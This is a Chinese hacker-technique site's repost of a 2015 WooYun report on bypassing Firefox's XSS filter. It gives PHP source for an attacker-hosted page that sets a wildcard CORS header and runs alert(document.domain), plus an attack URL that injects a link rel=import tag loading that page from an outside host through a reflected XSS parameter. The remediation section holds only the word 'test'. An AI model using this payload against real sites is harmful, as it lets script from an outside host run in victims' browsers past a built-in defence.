记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

Firefox浏览器最新版xss过滤器绕过

2015-12-11 11:55

2.png



1.png



构造php源码如下:

code 区域
<?php



header("Access-Control-Allow-Origin: *");



?>



<script>



alert(document.domain);



</script>









攻击url:如果id存在反射型xss:



http://127.0.0.1/index.php?id=%3Clink%20rel=import%20href=http://wutongyu.info/host.php%3E



访问直接绕过了xss过滤器:

漏洞证明:

3.png

修复方案:

test


知识来源: www.wooyun.org/bugs/wooyun-2015-0137018

阅读:189952 | 评论:0 | 标签:xss

想收藏或者和大家分享这篇好文章→复制链接地址

“Firefox浏览器最新版xss过滤器绕过”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

黑帝公告 📢

永久免费持续更新精选优质黑客技术文章Hackdig,帮你成为掌握黑客技术的英雄

标签云 ☁